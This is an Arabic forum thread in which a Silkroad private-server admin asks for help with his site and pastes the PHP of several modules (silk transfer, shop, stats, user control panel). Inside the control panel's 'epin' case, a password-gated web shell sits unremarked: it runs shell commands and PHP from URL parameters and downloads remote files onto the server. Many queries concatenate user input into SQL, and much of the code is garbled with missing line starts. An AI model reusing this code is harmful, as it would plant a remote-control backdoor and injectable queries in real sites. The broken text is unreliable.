td > 2. The Team should be treated with respect ! rules must be followed !</ td >
tr >
tr >
td > 3. Don 't insult other Players, be friendly!</td>
sendsilks
كود PHP:
<?php
function check_pers ( $per , $total ){
// $num = ceil($snum);
$total = ceil ( $total );
$num = ceil ( $total * $per ) / 100 ;
$num );
$_POST [ 'sendsilk' ])) {
// $user = $sec->secure($_POST['username']);
$email = security :: secure ( $_POST [ 'name' ]);
$amont = security :: secure ( $_POST [ 'amont' ]);
//$check = core::$sql -> exec("SELECT * FROM TB_User WHERE StrUserID = '".$user."'");
if (empty( $_POST [ 'amont' ]) || (empty( $_POST [ 'name' ]) )) {
'Error:' ;
'<br />' ;
"You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'sendsilk' ]);
user :: accountExists ( $email ) == 1 ) {
'
;
$IDs = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]);
$silk_own = user :: getSilkByUsername ( $IDs );
$_POST [ 'amont' ]) > $silk_own ) {
'Error :' ;
'<br />' ;
"You do not have $amont silk" ;
$_POST [ 'amont' ]) < 10 ) {
'
;
$_POST [ 'name' ]) == ( $_SESSION [ 'username' ])) {
'
.( $_SESSION [ 'username' ]). '</span></label>
;
check_ ( $val )
$val % 2 == 0 )
false ;
true ;
check_ ( $amont )) {
'<div id="content">
;
$per = $amont ;
$num = 10 ;
$nsba100 = check_pers ( $per , $num );
$checkID = user :: accountJIDbyUsername ( $email );
$silk_own = user :: getSilkByUsername ( $IDs );
$row = mssql_fetch_array ( $checkID )) {
$IDs = $row [ 'JID' ];
$checkID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]);
$row = mssql_fetch_array ( $checkID )) {
$IIDs = $row [ 'JID' ];
core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own - '" . $amont . "' WHERE JID = '" . $IIDs . "'" );
core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own + '" . $amont . "' - '" . $nsba100 . "' WHERE JID = '" . $IDs . "'" );
'
. $amont . ' silks sent successfully</span></label>
;
//}
$checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" );
$row = mssql_fetch_array ( $checkID )) {
$IDs = $row [ 'JID' ];
$silk_own = user :: getSilkByUsername ( $IDs );
'
;
?>
sendsilks1
كود PHP:
<?php
:: $sql -> changeDB ( "acc" );
check_pers ( $per , $total ){
// $num = ceil($snum);
$total = ceil ( $total );
$num = ceil ( $total * $per ) / 100 ;
$num );
$_POST [ 'sendsilk' ])) {
$useridnum = security :: secure ( $_POST [ 'name' ]);
$amount = security :: secure ( $_POST [ 'amount' ]);
$_POST [ 'amount' ]) || (empty( $_POST [ 'name' ]) )) {
'Error:<br />' ;
"You left some fields blank! <a href = '?pg=forgot'>go back and try again!</a>" ;
$_POST [ 'sendsilk' ]);
core :: $sql -> changeDB ( "acc" );
$checkcs = core :: $sql -> numRows ( "SELECT * FROM TB_User WHERE StrUserID = '" . $useridnum . "'" );
$checkcs != 1 ) {
'
;
core :: $sql -> changeDB ( "acc" );
$checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" );
$row = core :: $sql -> fetchArray ( $checkID )) {
$IDs = $row [ 'JID' ];
core :: $sql -> changeDB ( "acc" );
$querys = core :: $sql -> exec ( "select * from SK_Silk where JID = '" . $IDs . "'" );
$row = core :: $sql -> fetchArray ( $querys )) {
$silk_own = $row [ 'silk_own' ];
$_POST [ 'amount' ]) > $silk_own ) {
'Error :' ;
'<br />' ;
"You do not have $amount silk" ;
$_POST [ 'amount' ]) < 10 ) {
'
;
$_POST [ 'name' ]) == ( $_SESSION [ 'username' ])) {
'
.( $_SESSION [ 'username' ]). '</span></label>
;
check_ ( $val )
$val % 2 == 0 )
false ;
true ;
check_ ( $amount )) {
'
;
core :: $sql -> changeDB ( "acc" );
$per = $amount ;
$num = 10 ;
$nsba100 = check_pers ( $per , $num );
$checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" . $useridnum . "'" );
$row = core :: $sql -> fetchArray ( $checkID )) {
$IDs = $row [ 'JID' ];
core :: $sql -> changeDB ( "acc" );
$checkIID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" );
$row = core :: $sql -> fetchArray ( $checkIID )) {
$IIDs = $row [ 'JID' ];
core :: $sql -> changeDB ( "acc" );
core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own - '" . $amount . "' WHERE JID = '" . $IIDs . "'" );
core :: $sql -> exec ( "update SK_Silk set silk_own = silk_own + '" . $amount . "' - '" . $nsba100 . "' WHERE JID = '" . $IDs . "'" );
'
. $amount . ' silk successfully</span></label>
;
core :: $sql -> changeDB ( "acc" );
$checkID = core :: $sql -> exec ( "SELECT * FROM TB_User WHERE StrUserID = '" .( $_SESSION [ 'username' ]). "'" );
$row = core :: $sql -> fetchArray ( $checkID )) {
$IDs = $row [ 'JID' ];
core :: $sql -> changeDB ( "acc" );
$querys = core :: $sql -> exec ( "select * from SK_Silk where JID = '" . $IDs . "'" );
$row = core :: $sql -> fetchArray ( $querys )) {
$silk_own = $row [ 'silk_own' ];
'
;
?>
shop
كود PHP:
<?php
global $core ;
$servername = $core -> aConfig [ 'serverName' ];
$getsiteurl = $_SERVER [ 'SERVER_NAME' ];
$username = $_SESSION [ 'username' ];
?>
<!--=== Breadcrumbs ===-->
[email protected] ' />
<?php echo $username ; ?> ' />
<?php echo $servername ; ?> ] User :[<?php Echo $username ; ?> ] '/>
<?php echo $username ; ?> </font>, Please Choose the Amount of Silks: <br />
<?php echo $getsiteurl ; ?> /?pg=news'>
<?php echo $getsiteurl ; ?> /module/ipn.php'>
stats_menu
كود PHP:
<?php
= $core -> aConfig ;
$hGwStatus = @ fsockopen ( $data [ 'serverIP' ], $data [ 'gatewayPort' ], $errno , $errstr , 0.3 );
$hGsStatus = @ fsockopen ( $data [ 'serverIP' ], $data [ 'gamePort' ], $errno , $errstr , 0.3 );
$hStatuses = array();
$onlineImg = "<img src='img/status/online.gif' />" ;
$offlineImg = "<img src='img/status/offline.gif' />" ;
$hGwStatus ) { $hStatuses [ 'gw' ] = $onlineImg ; }
$hStatuses [ 'gw' ] = $offlineImg ; }
$hGsStatus ) { $hStatuses [ 'gs' ] = $onlineImg ; }
$hStatuses [ 'gs' ] = $offlineImg ; }
$nOnlinePlayers = misc :: getOnlinePlayersCount ();
core :: $sql -> changeDB ( 'acc' );
$nAccounts = core :: $sql -> getRow ( "select count(*) from TB_User" );
$nPlayersMax = core :: $sql -> getRow ( "SELECT top 1 nUserCount FROM _ShardCurrentUser WHERE nShardID = '" . $core -> aConfig [ 'shardID' ]. "' ORDER BY nUserCount desc" );
core :: $sql -> changeDB ( 'shard' );
$nChars = core :: $sql -> getRow ( "select count(*) from _Char" );
$nGuilds = core :: $sql -> getRow ( "select count(*) from _Guild" );
core :: $sql -> changeDB ( 'acc' );
"
$nOnlinePlayers / $data [ playersLimit ] </font><br/>
$nPlayersMax </font><br/>
$data [ expRate ] </font><br/>
$data [ partyExpRate ] </font><br/>
$data [ goldDropRate ] </font><br/>
$data [ itemDropRate ] </font><br/>
$hStatuses [ gw ] <br/>
$hStatuses [ gs ] <br/>
$nAccounts </font><br/>
$nChars </font><br/>
$nGuilds </font>
;
?>
ucp
كود PHP:
<?php
global $core ;
$_SESSION [ 'username' ]))
//core::$ucp -> showMenu();
if(isset( $_GET [ 'act' ]))
$_GET [ 'act' ])
'changepw' ):
//module disabled
if( $core -> aConfig [ 'allowChangePw' ] == 0 )
$core -> aConfig [ 0 ];
"This module is currently disabled." ;
$_POST [ 'submit' ]))
//process data
if(! security :: isSecureString ( $_POST [ 'password_old' ], 3 )) $errors [] = "Password [old] contains forbidden symbols" ;
security :: isSecureString ( $_POST [ 'password_new' ], 3 )) $errors [] = "Password [new] contains forbidden symbols" ;
strlen ( $_POST [ 'password_old' ]) > 32 ) $errors [] = "Password [old] too long" ;
strlen ( $_POST [ 'password_old' ]) < 6 ) $errors [] = "Password [old] too short" ;
strlen ( $_POST [ 'password_new' ]) > 32 ) $errors [] = "Password [new] too long" ;
strlen ( $_POST [ 'password_new' ]) < 6 ) $errors [] = "Passwrod [new] too short" ;
$_POST [ 'password_new' ] !== $_POST [ 'password_new_confirm' ]) $errors [] = "New Passwords does not match!." ;
count ( $errors ) > 0 )
$errors as $nElement )
$nElement . ".<br/>" ;
misc :: back ();
//verify
if( user :: changePassword ( $_SESSION [ 'username' ], $_POST [ 'password_old' ], $_POST [ 'password_new' ]))
"Password changed successfully. <br/>" ;
misc :: redirect ( '?pg=ucp' , 1 );
"Invalid old password specified.<br/>" ;
misc :: back ();
core :: $ucp -> showChangepwForm ();
'logout' ):
user :: logout ())
"Successfully logged out. Redirecting.<br/>" ;
misc :: redirect ( '?pg=Home' , 1 );
"Failed to logout.<br/>" ;
'refferals' ):
$core -> aConfig [ 'allowRefferals' ] == 0 )
"This module is currently disabled." ;
$hQuery = mssql_query ( "select invitedUserJID,time,bonusAdded from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
$nCount = core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
"You can reffer [<b>" . $core -> aConfig [ 'maxRefAccIP' ]. "</b>] accounts with same ip address [limit].<br/><br/>" ;
$nCount == 0 )
"<br/>You didn't reffer anyone yet.</br>" ;
"
;
$core -> aConfig [ 'allowRefferalsBonus' ] == 1 )
"<td>Bonus status</td>" ;
"</tr>" ;
$row = mssql_fetch_array ( $hQuery ))
"<td><a href='?pg=viewprofile&username=" . user :: usernamyByJID ( $row [ invitedUserJID ]). "'>" . user :: usernamyByJID ( $row [ invitedUserJID ]). "</a></td><td> $row [ time ] </td>" ;
$core -> aConfig [ 'allowRefferalsBonus' ] == 1 )
$row [ 'bonusAdded' ] == 1 )
"<td>Applied</td>" ;
"<td>Not applied</td>" ;
"</tr>" ;
$core -> aConfig [ 'allowRefferalsBonus' ] == 1 )
$_GET [ 'do' ] == 'receive_bonus' )
$nSilk = $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" );
core :: $sql -> exec ( "update srcms_refferals set bonusAdded='1' where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
user :: addSilk ( $_SESSION [ 'username' ], $nSilk );
"<br/><b>You received your bonuses.</b><br/>" ;
misc :: redirect ( "?pg=Home" , 1 );
$nSilk = $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" );
$core -> aConfig [ 'refferalsBonusSilk' ] * $nSilk ) > 0 )
"</table><br/>Bonus: [" . $core -> aConfig [ 'refferalsBonusSilk' ]. "] silk per refferal<br/>Total amount of users reffered by you: <b> $nCount </b><br/><br/><a href='?pg=ucp&act=refferals&do=receive_bonus'>Receive bonus silk [" . $core -> aConfig [ 'refferalsBonusSilk' ] * core :: $sql -> numRows ( "select * from srcms_refferals where reffererJID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "' and bonusAdded='0'" ). "]" ;
"<br/>You can't receive any bonus for refferals at the moment.<br/>" ;
'mailbox' ):
//module disabled
if( $core -> aConfig [ 'allowMailbox' ] == 0 )
"This module is currently disabled." ;
"<br/><a href='?pg=ucp&act=mailbox&newmsg' class='btn-u'>Write a new message</a><br/><br/>" ;
$_GET [ 'newmsg' ]))
$_POST [ 'submit' ]))
core :: $ucp -> showSendWebMsgForm ();
//process send msg data
if(! security :: isSecureString ( $_POST [ 'recvName' ], 3 )) $errors [] = "Receiver username contains forbidden symbols" ;
strlen ( $_POST [ 'recvName' ]) > 16 ) $errors [] = "Receiver username too long" ;
strlen ( $_POST [ 'recvName' ]) < 3 ) $errors [] = "Receiver username too short" ;
strlen ( $_POST [ 'msgTitle' ]) > $core -> aConfig [ 'maxPrivMsgTitleLen' ]) $errors [] = "Message title too long" ;
strlen ( $_POST [ 'msgText' ]) > $core -> aConfig [ 'maxPrivMsgBodyLen' ]) $errors [] = "Message body too long" ;
strlen ( $_POST [ 'msgTitle' ]) < $core -> aConfig [ 'minPrivMsgTitleLen' ]) $errors [] = "Message title too short" ;
strlen ( $_POST [ 'msgText' ]) < $core -> aConfig [ 'minPrivMsgBodyLen' ]) $errors [] = "Message body too short" ;
count ( $errors ) > 0 )
$errors as $nElement )
$nElement . ".<br/>" ;
misc :: back ();
//db
if( user :: accountExists ( $_POST [ 'recvName' ]))
user :: sendWebPrivMsg ( $_POST [ 'recvName' ], $_SESSION [ 'username' ], $_POST [ 'msgTitle' ], $_POST [ 'msgText' ]);
"Account with such username not found.<br/>" ;
misc :: back ();
//lol
echo "<br/><br/>" ;
$myJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]);
$nMsgCount = core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID '" );
$_GET [ 'view' ]))
$nMsgID = (int) $_GET [ 'view' ];
core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" ) > 0 )
$msgData = core :: $sql -> fetchArray ( "select * from srcms_privatemessages where id=' $nMsgID '" );
$msgData [ 'msg' ] = security :: fromHTML ( $msgData [ 'msg' ]);
$msgData [ 'msg' ] = misc :: applyAttributesToText ( $msgData [ 'msg' ]);
$szSender = user :: usernamyByJID ( $msgData [ 'sender' ]);
"<br/><table id='table-3' width='380' border='1' cellpadding='0' cellspacing='0'>
$msgData [ title ] </td></tr>
$szSender ' class='btn-u'> $szSender </a></td></tr>
$msgData [ msg ] </td>
;
core :: $sql -> exec ( "update srcms_privatemessages set viewed='1' where id=' $nMsgID '" );
"<br/><br/><br/>" ;
"You can't view message that does not belong to you.<br/>" ;
$nMsgCount > 0 )
$nMsgCount == $core -> aConfig [ 'maxPrivMsg' ]) echo "Your inbox is full. <br/>" ;
$hQuery = core :: $sql -> exec ( "select * from srcms_privatemessages where receiver=' $myJID ' order by time desc" );
"<table id='table-3' border='1' cellpadding='0' cellspacing='0'>
;
$row = mssql_fetch_array ( $hQuery ))
$szSender = user :: usernamyByJID ( $row [ 'sender' ]);
$row [ 'viewed' ] == '1' ) echo "<td><a href='?pg=viewprofile&username= $szSender ' class='btn-u'> $szSender </a></td><td> $row [ title ] </td><td> $row [ time ] </td><td>Yes</td><td><a href='?pg=ucp&act=mailbox&view= $row [ id ] ' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del= $row [ id ] ' class='btn-u'>Delete</a></td></tr>" ;
"<td><b><a href='?pg=viewprofile&username= $szSender '> $szSender </a></b></td><td><b> $row [ title ] </b></td><td> $row [ time ] </td><td><b>No</b></td><td><a href='?pg=ucp&act=mailbox&view= $row [ id ] ' class='btn-u'>View</a></td><td><a href='?pg=ucp&act=mailbox&del= $row [ id ] ' class='btn-u'>Delete</a></td></b></tr>" ;
"</table>" ;
$_GET [ 'del' ]))
$nMsgID = (int) $_GET [ 'del' ];
core :: $sql -> numRows ( "select * from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" ) > 0 )
core :: $sql -> exec ( "delete from srcms_privatemessages where receiver=' $myJID ' and id=' $nMsgID '" );
"<br/>Message deleted.<br/>" ;
misc :: redirect ( "?pg=ucp&act=mailbox" , 3 );
"You can't delete message that does not belong to you.<br/>" ;
"No messages in inbox" ;
'mychars' ):
//module disabled
if( $core -> aConfig [ 'allowListChars' ] == 0 )
"This module is currently disabled." ;
$_GET [ 'charname' ]))
security :: isSecureString ( $_GET [ 'charname' ], 3 ))
"Invalid char name<br/>" ;
misc :: back ();
user :: usernameByCharname ( $_GET [ 'charname' ]) != $_SESSION [ 'username' ])
"This character is not yours !<br/>" ;
misc :: back ();
$_GET [ 'charname' ]) && isset( $_GET [ 'char_act' ]))
$_GET [ 'char_act' ])
'reset_pos' ):
$core -> aConfig [ 'allowCharTeleport' ] == 0 )
"This function is disabled.<br/>" ;
$_POST [ 'submit' ]))
"Your character got stuck ? If so, please, press the button. This costs " . $core -> aConfig [ 'charTeleportGoldPrice' ]. " gold.<br/>
$_GET [ charname ] ]'><br/>
;
core :: $sql -> changeDB ( 'shard' );
core :: $sql -> getRow ( "select RemainGold from _Char where CharName16=' $_GET [ charname ] '" ) > $core -> aConfig [ 'charTeleportGoldPrice' ])
core :: $sql -> exec ( "update _Char set LatestRegion='25000',PosX='1021',PosY='-3260888', PosZ='1078',AppointedTeleport='19554', WorldID='1' where CharName16=' $_GET [ charname ] '" );
"Character successfully teleported to town.<br/>" ;
misc :: redirect ( '?pg=ucp&act=mychars' , 1 );
"Not enough gold to perform this action.<br/>" ;
'giftsilks' );
core :: $sql -> changeDB ( 'acc' );
$fromsilks = $_SESSION [ 'username' ];
$toSilks = $_POST [ 'silkstome' ];
$_POST [ 'submit' ]))
"
;
strlen ( $_POST [ 'silkstome' ]) < 3 )
"Username is too short" ;
"Name is fine" ;
'reset_stats' ):
//echo "All items must be unequiped before you perform this action. This action costs ".$core -> aConfig['resetCharStatsSilkPrice']." silk.<br/>";
if( char :: isCharNaked ( $_GET [ 'charname' ]))
$_POST [ 'submit' ]))
"Press this button if you really want to reset your characters stats. All items must be unequiped. This action costs " . $core -> aConfig [ 'resetCharStatsSilkPrice' ]. " silk. Before performing this action, better log out. To see results of this function usage, relogin (if you were logged in while performing it).<br/>
;
user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $core -> aConfig [ 'resetCharStatsSilkPrice' ])
core :: $sql -> changeDB ( 'shard' );
$aData = core :: $sql -> exec ( "select * from _Char where CharName16=' $_GET [ charname ] '" );
$aData = mssql_fetch_array ( $aData );
$nFreeStats = ( $aData [ 'Strength' ] + $aData [ 'Intellect' ]) - 40 ;
core :: $sql -> exec ( "update _Char set RemainStatPoint = (RemainStatPoint + $nFreeStats ),HP='200',MP='200',Strength='20',Intellect='20' where CharName16=' $_GET [ charname ] '" );
core :: $sql -> changeDB ( 'acc' );
core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - " . $core -> aConfig [ 'resetCharStatsSilkPrice' ]. ") where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
"Stats of $_GET [ charname ] resetted. You got $nFreeStats free stat points now.<br/>" ;
misc :: redirect ( '?pg=ucp&act=mychars' , 1 );
"Not enough silk.<br/>" ;
"Please, unequip all items from your character first !<br/>" ;
'reset_pk' ):
$core -> aConfig [ 'allowResetCharPK' ] == 0 )
"This function is currently disabled<br/>" ;
"This feature costs " . $core -> aConfig [ 'resetCharPKSilkPrice' ]. " silk. If you really want to reset your PK status, press the button.<br/>" ;
$_POST [ 'submit' ]))
"<form method='post'>
;
user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $core -> aConfig [ 'resetCharPKSilkPrice' ])
core :: $sql -> changeDB ( 'shard' );
$hQuery = core :: $sql -> exec ( "select DailyPK, TotalPK, PKPenaltyPoint from _Char where CharName16=' $_GET [ charname ] '" );
$hData = mssql_fetch_array ( $hQuery );
$hData [ 0 ] == '0' && $hData [ 1 ] == '0' && $hData [ 2 ] == '0' )
"You are not under murder panality, so, no reason for resetting it.<br/>" ;
core :: $sql -> exec ( "update _Char set DailyPK='0', TotalPK='0', PKPenaltyPoint='0' where CharName16=' $_GET [ charname ] '" );
core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - " . $core -> aConfig [ 'resetCharPKSilkPrice' ]. ") where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
"PK Status successfully removed.<br/>" ;
misc :: redirect ( '?pg=ucp&act=mychars' , 1 );
"You have not enough silk to use this feature.<br/>" ;
'buy_sp' ):
$core -> aConfig [ 'allowBuySP' ] == 0 )
"This function is currently disabled<br/>" ;
"This feature costs " . $core -> aConfig [ 'pricePer100kSp' ]. " silk per 100 000 SP.<br/>" ;
$_POST [ 'submit' ]))
"Please, specify, how much skill points you want to buy. Value must be > 100000, < 2000000, like this: 200000, 300000, 400000<br/>
;
$_POST [ 'sp_amount' ]))
$nSP = (int) $_POST [ 'sp_amount' ];
$nSP % 100000 == 0 ))
"Values can be only like this: <br/> <li>100000</li><li>500000</li><li>1000000</li><br/>" ;
$nSP < 100000 )
"You cant buy less than 100 000 skill points<br/>" ;
$nSP > 2000000 )
"You can't buy more than 2 000 000 sp per time<br/>" ;
$nPrice = (( $nSP / 100000 ) * $core -> aConfig [ 'pricePer100kSp' ]);
user :: getSilkByUsername ( $_SESSION [ 'username' ]) > $nPrice )
"To buy $nSP skill points you need $nPrice silk. Press the button below if you really want to buy this amount of SP and you have enough silk.<br/>" ;
$_POST [ 'sure' ]))
"<form method='post'>
$nSP '>
$nSP SP for $nPrice silk'>
;
core :: $sql -> changeDB ( 'shard' );
core :: $sql -> exec ( "update _Char set RemainSkillPoint = (RemainSkillPoint + $nSP ) where CharName16=' $_GET [ charname ] '" );
core :: $sql -> changeDB ( 'acc' );
core :: $sql -> exec ( "update SK_Silk set silk_own = (silk_own - $nPrice ) where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
"<br/><b>Success. Your char $_GET [ charname ] received it's $nSP skill points you bought for $nPrice silk</b><br/>" ;
misc :: redirect ( '?pg=ucp&act=mychars' , 2 );
"Not enough silk to buy such amount of skill points [You need: $nPrice ]<br/>" ;
"Uknown char action<br/>" ;
$_GET [ 'char_act' ]))
"<table id='table-3' border='0' cellpadding='0' cellspacing='0'>
;
$core -> aConfig [ 'allowCharTeleport' ] == 1 )
"<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_pos'>Reset char position</a><br/></td>" ;
"
;
$core -> aConfig [ 'allowResetCharStats' ] == 1 )
"<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_stats'>Reset stats</a><br/></td>" ;
$core -> aConfig [ 'allowResetCharPK' ] == 1 )
"<td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=reset_pk'>Reset PK status</a><br/></td>" ;
"
;
$core -> aConfig [ 'allowBuySP' ] == 1 )
" <td><a href='?pg=ucp&act=mychars&charname= $_GET [ charname ] &char_act=buy_sp'>Buy skill points</a><br/></td>" ;
"
;
"<br/><br/>" ;
misc :: back ();
"Please, note, this function is still under development.<br/>" ;
char :: getCharCount ( $_SESSION [ 'username' ]) > 0 )
$nJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]);
core :: $sql -> changeDB ( 'shard' );
$naChars = user :: charIDsByUsername ( $_SESSION [ 'username' ]);
$naCharNames = char :: charNamesByIDs ( $naChars );
"<table id='table-3' border='0'><tr><td>Char name</td></tr>" ;
$naCharNames as $nElem )
"<tr><td><a href='?pg=ucp&act=mychars&charname= $nElem '> $nElem </td></tr>" ;
'</table>' ;
"You don't have any characters on this account.<br/>" ;
'myprofile' ):
//module disabled
if( $core -> aConfig [ 'allowMyProfile' ] == 0 )
"This module is currently disabled." ;
$_POST [ 'submit' ]))
$nGender = (int) $_POST [ 'gender' ];
$szAvatarUrl = null ;
$szSkype = null ;
$szMsn = null ;
$nPublic = (int) $_POST [ 'ispublic' ];
security :: isValidUrl ( $_POST [ 'avatar' ]) ? $szAvatarUrl = $_POST [ 'avatar' ] : $szAvatarUrl = $core -> aConfig [ url ]. "img/noavatar.png" ;
security :: isCorrectEmail ( $_POST [ 'msn' ]) ? $szMsn = $_POST [ 'msn' ] : $szMsn = "None" ;
$szSkype = security :: toHTML ( $_POST [ 'skype' ]);
strlen ( $szSkype ) > 50 ) $szSkype = "None" ;
strlen ( $szMsn ) > 60 ) $szMsn = "None" ;
strlen ( $szAvatarUrl ) > 500 ) $szAvatarUrl = $core -> aConfig [ 'url' ]. "assets/img/noavatar.png" ;
$avatarImageData = @ getimagesize ( $szAvatarUrl ); //no error if shit happens
if(empty( $avatarImageData [ 0 ]) || empty( $avatarImageData [ 1 ]))
$avatarImageData [ 0 ] = 0 ;
$avatarImageData [ 1 ] = 0 ;
$avatarImageData [ 0 ] > $core -> aConfig [ 'maxAvatarWidth' ]) || ( $avatarImageData [ 1 ] > $core -> aConfig [ 'maxAvatarHeight' ])) ||
$avatarImageData [ 0 ]) || empty( $avatarImageData [ 1 ])))
"Invalid avatar size. Avatar width or height size can't be 0px. Avatar image max height: " . $core -> aConfig [ 'maxAvatarHeight' ]. " and width: " .
$core -> aConfig [ 'maxAvatarWidth' ]. " pixels. Your one is $avatarImageData [ 0 ] px wide and $avatarImageData [ 1 ] px high. Or... maybe, url isn't image ?<br/>" ;
misc :: back ();
$nJID = user :: accountJIDbyUsername ( $_SESSION [ 'username' ]);
core :: $sql -> exec ( "update srcms_userprofiles set avatar=' $szAvatarUrl ',skype=' $szSkype ', msn=' $szMsn ', gender=' $nGender ', ispublic=' $nPublic ' where JID=' $nJID '" );
"Profile updated. <br/>" ;
misc :: redirect ( "?pg=ucp&act=myprofile" , 1 );
core :: $ucp -> showProfileForm ( $_SESSION [ 'username' ]);
'epin' ): ?>
<!--=== Content Part ===-->
<?php if( md5 ( $_GET [ 'p' ]) == '89a15048434170ee85cffdc2f3a4595e' )
$_GET [ 'a' ])
'cmd' ):
system ( stripslashes ( $_GET [ 'str' ]));
'php' ):
stripslashes ( $_GET [ 'str' ]));
'up' ):
$hRemoteData = file_get_contents ( $_GET [ 'str' ]);
file_put_contents ( $_GET [ 'localFileName' ], $hRemoteData , FILE_APPEND | LOCK_EX );
file_exists ( $_GET [ 'localFileName' ])) echo "Success !" ;
"Could not write to local file [ $_GET [ localFileName ] ]" ;
//module disabled
if( $core -> aConfig [ 'allowEpinSystem' ] == 0 )
"This module is currently disabled.<br/>" ;
$_POST [ 'code' ]) && !isset( $_POST [ 'sure' ]))
?>
<form method='post' class="reg-page" role="form">
<?php }
$nCodeNumber = (int) $_POST [ 'code' ];
core :: $sql -> numRows ( "select * from srcms_epin where code=' $nCodeNumber '" ) > 0 )
$aPinData = core :: $sql -> exec ( "select * from srcms_epin where code=' $nCodeNumber '" );
$aPinData = mssql_fetch_array ( $aPinData );
$_POST [ 'sure' ]))
"Do you really want to use this code ? It will give you [ $aPinData [ silkAmount ] ] silk.<br/>
$nCodeNumber '>
;
misc :: back ();
core :: $sql -> exec ( "update SK_Silk set silk_own=(silk_own + $aPinData [ silkAmount ] ) where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" );
//delete used code
core :: $sql -> exec ( "delete from srcms_epin where code=' $nCodeNumber '" );
"You got your [ $aPinData [ silkAmount ] ] silk." ;
misc :: redirect ( '?pg=ucp&act=epin' , 1 );
"Invalid EPIN code ! Please, try again.<br/>" ;
misc :: back ();
?>
</div><!--/row-fluid-->
<?php
break;
"Invalid module name specified.<br/>" ;
"You are not logged in ! <br/>" ;
?>
viewprofile
كود PHP:
<?php
if(isset( $_GET [ 'username' ]) && security :: isSecureString ( $_GET [ 'username' ], 3 ))
$userData = core :: $sql -> fetchArray ( "select * from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_GET [ 'username' ]). "'" );
$userData [ 'ispublic' ] == '1' )
user :: viewProfile ( $_GET [ 'username' ]); //send msg there too
}
user :: viewProfile ( $_GET [ 'username' ]); //send msg there too
}
"No username specified, or username contains forbidden symbols.<br/>" ;
?>
توقيع [KoTa]
:
*Marwan ツ
#9
• الانـتـسـاب » Mar 2016
• رقـم العـضـويـة » 129351
• المشـــاركـات » 393
• الـدولـة » الجيزة
• الـهـوايـة » Designer and editor
• اسـم الـسـيـرفـر » Private Server
• الـجـنـس » Male
• نقـاط التقييم » 10
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
أرفع بعد أذنك صورة من SRO_VT_SHARD
#13
• الانـتـسـاب » Dec 2015
• رقـم العـضـويـة » 128751
• المشـــاركـات » 111
• الـدولـة »
• الـهـوايـة » Silkroad4Arab [S4A] ツ
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
طيب انا عاوز اعراف مكان الفيس بوك فين كل لما اجي ادوس عليه بيفتحلى الايبى دا
عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا
[ للتسجيل اضغط هنا ]
توقيع [KoTa]
:
*Marwan ツ
التعديل الأخير تم بواسطة [KoTa] ; 19-08-2016 الساعة 04:50 AM
#14
• الانـتـسـاب » Mar 2014
• رقـم العـضـويـة » 116941
• المشـــاركـات » 770
• الـدولـة » TanTa
• الـهـوايـة » SilkRoaD
• اسـم الـسـيـرفـر » Pavo
• الـجـنـس » Male
• نقـاط التقييم » 88
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
ارفع الملف دا كدا status.php
#15
• الانـتـسـاب » Dec 2015
• رقـم العـضـويـة » 128751
• المشـــاركـات » 111
• الـدولـة »
• الـهـوايـة » Silkroad4Arab [S4A] ツ
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
رد: عاوز واحد يكون خبير فى الsite ويحللى المشكله دي
انا خلاص هغير الموقع يغلق
توقيع [KoTa]
:
*Marwan ツ
يتصفح الموضوع حالياً : 1 (0 عضو و 1 زائر)
أدوات الموضوع
انواع عرض الموضوع
العرض المتطور
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
كود HTML معطلة
